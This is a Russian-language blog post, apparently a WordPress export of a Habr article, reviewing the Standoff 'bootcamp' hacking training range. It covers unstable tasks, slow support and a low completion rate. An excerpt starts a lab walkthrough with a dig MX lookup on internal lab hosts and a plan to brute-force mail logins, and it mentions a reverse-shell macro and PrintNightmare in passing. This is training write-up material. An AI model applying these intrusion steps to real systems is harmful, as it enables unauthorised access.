\u0422\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0441 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u043c, \u0433\u0434\u0435 \u043f\u043e \u0437\u0430\u0434\u0443\u043c\u043a\u0435 \u0430\u0432\u0442\u043e\u0440\u043e\u0432, \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0441 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u0440\u0435\u0432\u0435\u0440\u0441-\u0448\u0435\u043b\u043b. \u0415\u0449\u0435 \u0431\u044b\u043b\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u043d\u0430 printnightmare, \u043e\u043d \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u043b, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0435\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u043b\u0438, \u043d\u043e \u044f \u043f\u043e\u0448\u0435\u043b \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u0443\u0442\u0435\u043c \u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u0443\u0436\u0435 \u043d\u0435 \u0441\u0442\u0430\u043b \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043b\u0438\u0448\u043d\u0438\u0439 \u0442\u0438\u043a\u0435\u0442. \u0418\u0445 \u0438 \u0442\u0430\u043a \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e.<\/p>\n
\u0420\u0435\u0437\u044e\u043c\u0438\u0440\u0430\u044f, \u043c\u043e\u0433\u0443 \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043e\u0434\u043d\u0430 \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043d\u0435\u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b.<\/p>\n
\u041a \u0441\u043b\u043e\u0432\u0443, \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u043e\u0448\u043b\u0438 \u0431\u0443\u0442\u043a\u0435\u043c\u043f \u0441\u0443\u0434\u044f, \u043f\u043e \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u0443 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u0440\u0435\u0448\u0435\u043d\u043d\u044b\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 — 52 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430.<\/p>\n
\"\u0421\u0430\u043c\u044b\u0439_\u0441\u043b\u043e\u0436\u043d\u044b\u0439_\u0442\u0430\u0441\u043a_\u043d\u0430_\u0432\u0441\u0435\u043c_\u0434\u0438\u043a\u043e\u043c_\u0417\u0430\u043f\u0430\u0434\u0435\"<\/p>\n
\u0421\u0430\u043c\u044b\u0439_\u0441\u043b\u043e\u0436\u043d\u044b\u0439_\u0442\u0430\u0441\u043a_\u043d\u0430_\u0432\u0441\u0435\u043c_\u0434\u0438\u043a\u043e\u043c_\u0417\u0430\u043f\u0430\u0434\u0435<\/figcaption><\/div>\n<\/figure>\n
\u0410\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 — 2820<\/p>\n
\"\u0410\u043a\u0442\u0438\u0432\u043d\u044b\u0435_\u0445\u0430\u043a\u0435\u0440\u044b\"<\/p>\n
\u0410\u043a\u0442\u0438\u0432\u043d\u044b\u0435_\u0445\u0430\u043a\u0435\u0440\u044b<\/figcaption><\/div>\n<\/figure>\n
\u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u0441\u0447\u0435\u0442\u0430. \u0415\u0441\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0443 \u043d\u0430\u0441 2820, \u0430 \u043f\u0440\u043e\u0448\u043b\u0438 52 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430, \u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u043e\u0448\u043b\u0438 \u0431\u0443\u0442\u043a\u0435\u043c\u043f \u043e\u043a\u043e\u043b\u043e 1.84%. \u041c\u0435\u043d\u0435\u0435 2% \u043b\u044e\u0434\u0435\u0439 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437 \u0420\u0424, \u0441\u0443\u0434\u044f \u043f\u043e \u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0441\u0430\u0439\u0442 \u0438\u043c\u0435\u0435\u0442 \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0440\u0430\u0439\u0442\u0430\u043f\u044b \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0442\u0430\u0441\u043a\u043e\u0432 \u043d\u0430 \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u043c \u044f\u0437\u044b\u043a\u0435.<\/p>\n
\u041d\u0435 \u0437\u043d\u0430\u044e, \u043d\u0430 \u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u0430 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u043e\u0442\u0440\u0430\u0436\u0430\u0435\u0442 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0438 \u043f\u043e\u0447\u0435\u043c\u0443 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0438\u0437\u043a\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u043d\u0442 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f, \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e Standoff \u043f\u043e\u0437\u0438\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 bootcamp \u0438\u043c\u0435\u0435\u043d\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0449\u0438\u0445.<\/p>\n
\u0417\u0434\u0435\u0441\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0438\u0447\u0438\u043d \u043f\u043e\u0447\u0435\u043c\u0443 \u0442\u0430\u043a.<\/p>\n
\u041f\u0435\u0440\u0432\u0430\u044f —  \u0431\u0443\u0442\u043a\u0435\u043c\u043f \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0447\u0435\u043d\u044c \u0441\u043b\u043e\u0436\u043d\u044b\u0439 \u0432 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0438 \u0438 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043d\u043e\u0447\u0438\u0447\u043a\u043e\u0432 \u043e\u0442\u0441\u0435\u044f\u043b\u0438\u0441\u044c \u0443\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u043f\u0430\u0440\u044b \u0437\u0430\u0434\u0430\u043d\u0438\u0439.<\/p>\n
<\/figure>\n
\u0412\u0442\u043e\u0440\u043e\u0435 — \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f, \u0441\u0435\u0440\u0432\u0435\u0440 \u0441 \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c \u0443\u043f\u0430\u043b, \u043b\u044e\u0434\u0438 \u043e\u0431\u0440\u0430\u0449\u0430\u044e\u0442\u0441\u044f \u0432 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443, \u0430 \u0440\u0435\u0448\u0430\u044e\u0442\u0441\u044f \u0442\u0430\u043a\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u0431\u044b\u0441\u0442\u0440\u043e. \u0423 \u043c\u0435\u043d\u044f \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435. \u042f \u0441\u0435\u043b \u0440\u0435\u0448\u0430\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0432 \u043f\u044f\u0442\u043d\u0438\u0446\u0443 \u0432\u0435\u0447\u0435\u0440\u043e\u043c. \u041d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0442\u0430\u0441\u043a\u043e\u0432 web \u043e\u0442\u0441\u0443\u0442\u0441\u0432\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u044f\u0437\u044c \u0441 \u0431\u0430\u0437\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432 \u0438\u0442\u043e\u0433\u0435 \u043a\u043e\u043a\u0440\u0435\u0442\u043d\u044b\u0439 \u0442\u0430\u0441\u043a \u0440\u0435\u0448\u0438\u0442\u044c \u043d\u0435\u043b\u044c\u0437\u044f. \u041e\u0431\u0440\u0430\u0442\u0438\u043b\u0441\u044f \u0432 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 \u0432 \u043f\u044f\u0442\u043d\u0438\u0446\u0443 \u0432\u0435\u0447\u0435\u0440\u043e\u043c, \u043e\u0442\u0432\u0435\u0442 \u0431\u044b\u043b \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a \u0443\u0442\u0440\u043e\u043c. \u041f\u043e \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u043c \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442. \u0417\u0430 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0435 \u044f \u043d\u0435 \u0441\u043c\u043e\u0433 \u043f\u043e\u0440\u0435\u0448\u0430\u0442\u044c \u0431\u0443\u0442\u043a\u0435\u043c\u043f, \u0430 \u0432 \u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0443\u0436\u0435 \u043d\u0435 \u0431\u044b\u043b\u043e \u043d\u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0438 \u0436\u0435\u043b\u0430\u043d\u0438\u044f. \u0412 \u0438\u0442\u043e\u0433\u0435 \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u043f\u0440\u043e\u0441\u0442\u043e \u0441\u0433\u043e\u0440\u0430\u0435\u0442 \u0438 \u0431\u0440\u043e\u0441\u0430\u0435\u0442 \u044d\u0442\u043e \u0434\u0435\u043b\u043e.<\/p>\n
<\/figure>\n
\u0422\u0440\u0435\u0442\u044c\u0435 — \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043d\u0438\u0445 \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e \u0434\u0430\u0432\u043d\u043e \u043d\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u043b\u0438\u0441\u044c, \u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0438\u043b\u0438 \u043f\u0443\u0442\u0438 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442. \u042f \u0442\u0430\u043a\u0436\u0435 \u0441 \u044d\u0442\u0438\u043c \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u043b\u0441\u044f, \u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u0448\u0435\u043b \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u0443\u0442\u0435\u043c \u0438 \u0440\u0435\u0448\u0438\u043b \u043f\u0430\u0440\u0443 \u0442\u0430\u0441\u043a\u043e\u0432 \u043d\u0435 \u043f\u043e \u0437\u0430\u0434\u0443\u043c\u043a\u0435 \u0430\u0432\u0442\u043e\u0440\u0430. \u0422\u0430\u043a\u0436\u0435 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043e\u043a — \u044d\u0442\u043e \u043d\u0435 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438, \u0430 \u0442\u0443\u043f\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043f\u043e \u0442\u0438\u043f\u0443 \u201c\u0437\u0430\u044e\u0437\u0430\u0439\u0442\u0435 \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0441 \u043d\u043e\u043c\u0435\u0440\u043e\u043c\u201d. \u041d\u0435 \u043c\u043e\u0433\u0443 \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u043b\u043e\u0445\u043e, \u043d\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u0442\u043e\u043b\u043a\u043d\u0443\u0442\u044c.<\/p>\n
\u0427\u0442\u043e \u0438\u043c\u0435\u0435\u043c \u043f\u043e \u0438\u0442\u043e\u0433\u0443? \u041d\u0435\u043f\u043b\u043e\u0445\u0443\u044e \u0441\u0435\u0442\u044c \u0438\u0437 windows AD, \u043f\u0443\u0441\u0442\u044c \u043d\u0435 \u0441\u0430\u043c\u0443\u044e \u043d\u043e\u0432\u0443\u044e, \u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0443\u044e, \u0442\u0430\u043a\u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u043c\u0438 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c Debian \u0438 Ubuntu. \u041d\u0435 \u0441\u0430\u043c\u044b\u0435 \u0437\u0430\u0435\u0437\u0436\u0430\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0432 \u0446\u0435\u043b\u043e\u043c \u043d\u0435\u043f\u043b\u043e\u0445\u0443\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u043e\u0436\u043d\u043e \u043e\u0442\u0442\u043e\u0447\u0438\u0442\u044c \u043d\u0430\u0432\u044b\u043a\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u0441 netexec, impacket, C2 \u043d\u0430 \u0432\u044b\u0431\u043e\u0440 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0443\u0442\u0438\u043b\u0438\u0442. \u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u044d\u0442\u043e \u0435\u0449\u0435 \u0438 \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e.<\/p>\n
\u041e\u0434\u043d\u0430\u043a\u043e \u0437\u0430 \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0438 \u0434\u044c\u044f\u0432\u043e\u043b. \u0415\u0441\u043b\u0438 \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e, \u0442\u043e \u0432\u0430\u043c \u043d\u0438\u0447\u0435\u0433\u043e \u0438 \u043d\u0435 \u0434\u043e\u043b\u0436\u043d\u044b. \u041d\u0435 \u043d\u0443\u0436\u043d\u043e \u0443\u0434\u0438\u0432\u043b\u044f\u0442\u044c\u0441\u044f, \u0435\u0441\u043b\u0438 \u0432\u044b \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0435 \u043f\u043e\u0441\u043b\u0435 \u0440\u0430\u0431\u043e\u0442\u044b \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435 \u043f\u0440\u043e\u0439\u0442\u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443, \u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 \u043d\u0435\u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u0442\u0430\u0441\u043a. \u041b\u0430\u0434\u043d\u043e, \u043d\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0439\u0442\u0438 \u0434\u0440\u0443\u0433\u043e\u0439? \u0414\u0430, \u043d\u043e \u0435\u0441\u0442\u044c \u0438 \u043a\u043b\u044e\u0447\u0435\u0432\u043e\u0439 \u0442\u0430\u0441\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043f\u0443\u0441\u0442\u0438\u0442 \u0432\u0430\u0441 \u0432 \u0438\u043d\u0444\u0440\u0443, \u0435\u0441\u043b\u0438 \u0432\u044b \u0440\u0430\u043d\u0435\u0435 \u043d\u0435 \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043b\u0438 \u0444\u0430\u0439\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u0430\u2026<\/p>\n
\u0423 \u043c\u0435\u043d\u044f \u0431\u044b\u043b\u0438 \u0438 \u043d\u0435\u0440\u0432\u044b \u0438 \u0431\u0430\u0433\u0438 \u0438 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u0442\u0430\u0441\u043a\u0438. \u041a\u0441\u0442\u0430\u0442\u0438 \u0435\u0449\u0435 \u044f \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u043b \u0431\u0443\u0442\u043a\u0435\u043c\u043f, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0442\u0430\u0441\u043a \u0441 \u043f\u0438\u0441\u044c\u043c\u0435\u043d\u043d\u044b\u043c \u043e\u0442\u0447\u0435\u0442\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0436\u044e\u0440\u0438. \u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u0442\u044c\u0438 \u043e\u043d \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f 6 \u0434\u043d\u0435\u0439, \u0442\u0430\u043a \u0447\u0442\u043e \u0431\u0443\u0434\u044c\u0442\u0435 \u0433\u043e\u0442\u043e\u0432\u044b \u043a \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044e.<\/p>\n
\u042f \u043b\u0438\u0448\u044c \u043e\u043f\u0438\u0441\u0430\u043b \u0441\u0432\u043e\u0439 \u043e\u043f\u044b\u0442 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0438 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u043e\u0439. \u0423 \u043a\u043e\u0433\u043e-\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0432\u0441\u0435 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u0433\u043b\u0430\u0434\u043a\u043e \u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u0430\u0434\u0430\u0435\u0442 \u0438 \u043d\u0435 \u043b\u0430\u0433\u0430\u0435\u0442. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u043e\u0431\u0449\u0430\u0432\u0448\u0438\u0441\u044c \u0441 \u043a\u043e\u043b\u043b\u0435\u0433\u0430\u043c\u0438, \u044f \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u044f \u0442\u0430\u043a\u043e\u0439 \u043d\u0435 \u043e\u0434\u0438\u043d\u2026<\/p>\n<\/div>\n
\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 https:\/\/habr.com\/ru\/articles\/1043364\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
 \u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0445\u043e\u0442\u0435\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043a\u0430\u0436\u0434\u044b\u0439 \u043f\u043e\u0441\u0442 \u0434\u043b\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0432 \u0438\u043d\u0444\u0440\u0435, \u043d\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0435, \u0447\u0442\u043e \u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0430\u043c \u0434\u0430\u0436\u0435 \u043e\u0441\u043e\u0431\u043e \u043d\u0435\u0447\u0435\u0433\u043e, \u0442\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438 \u0432 \u0431\u0443\u0442\u043a\u0435\u043c\u043f\u0435 \u043e\u0447\u0435\u043d\u044c \u0441\u0438\u043b\u044c\u043d\u043e \u043e\u0431\u043b\u0435\u0433\u0447\u0430\u044e\u0442 \u0440\u0435\u0448\u0435\u043d\u0438\u0435. \u041d\u0430\u0447\u043d\u0435\u043c \u0441 \u043f\u0435\u0440\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u044b.[infra-1] \u0412\u043d\u0435\u0448\u043d\u044f\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0432 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430\u0445 \u043d\u0430\u043c \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0441\u0430\u0439\u0442 \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0443\u0436\u043d\u043e \u0438\u0441\u043a\u0430\u0442\u044c e-mail, \u0442\u043e \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u0441\u0430\u0439\u0442 www.edu.stf \u0438 \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0432 \u0444\u0443\u0442\u0435\u0440\u0435, \u043f\u043e\u0437\u0436\u0435 \u043e\u043d\u0438 \u043d\u0430\u043c \u0432\u0441\u0435 \u043f\u0440\u0438\u0433\u043e\u0434\u044f\u0442\u0441\u044f.\u0412\u0432\u043e\u0434\u0438\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0435\u0440\u0432\u044b\u0435 50 \u043e\u0447\u043a\u043e\u0432.[infra-2] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u043f\u043e\u0447\u0442\u0435\u0417\u0434\u0435\u0441\u044c \u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0430\u0440\u0438\u043b\u0441\u044f, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0434\u0443\u043c\u0430\u043b, \u0447\u0442\u043e \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430 \u0442\u043e\u043c \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0435, \u0447\u0442\u043e \u0438 \u0441\u0430\u0439\u0442. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u0443\u0436\u0435 \u043f\u0440\u043e\u0448\u0435\u043b web \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0431\u0443\u0442\u043a\u0435\u043c\u043f\u0430, \u0443 \u043c\u0435\u043d\u044f \u0443\u0436\u0435 \u0431\u044b\u043b \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u044d\u0442\u043e\u043c\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0443. \u042f \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b.\u041f\u043e\u0448\u0435\u043b \u0447\u0438\u0442\u0430\u0442\u044c \u0441\u0442\u0430\u0440\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u043a\u0438 \u0438 \u0432\u0441\u043f\u043e\u043c\u043d\u0438\u043b \u043f\u0440\u043e \u0443\u0442\u0438\u043b\u0438\u0442\u0443 dig. MX — \u0437\u0430\u043f\u0438\u0441\u044c \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0432 DNS.dig MX edu.stf @10.124.1.240; <<>> DiG 9.20.22-1-Debian <<>> MX edu.stf @10.124.1.240;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4969;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232; COOKIE: fcf10a9b3ec7da8e010000006a1015d40051135593be6226 (good);; QUESTION SECTION:;edu.stf.                       IN      MX;; ANSWER SECTION:edu.stf.                604800  IN      MX      10 mail.edu.stf.;; ADDITIONAL SECTION:mail.edu.stf.           604800  IN      A       10.124.1.203;; Query time: 207 msec;; SERVER: 10.124.1.240#53(10.124.1.240) (UDP);; WHEN: Fri May 22 04:37:44 EDT 2026;; MSG SIZE  rcvd: 101\u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0432 etc\/hosts.\u0414\u0430\u043b\u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Burp, \u043a\u0430\u043a \u043f\u0438\u0448\u0443\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0432\u0442\u043e\u0440\u044b \u0440\u0430\u0439\u0442\u0430\u043f\u043e\u0432, \u043d\u043e \u0434\u043b\u044f 3 email\u2019\u043e\u0432 \u0438 10 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u044d\u0442\u043e \u043a\u0430\u043a \u0433\u043d\u0430\u0442\u044c \u201c\u041a\u0410\u041c\u0410\u0417\u201d, \u0447\u0442\u043e\u0431\u044b \u0434\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u0441\u043e\u0441\u0435\u0434\u043d\u0435\u0433\u043e \u0434\u043e\u043c\u0430. 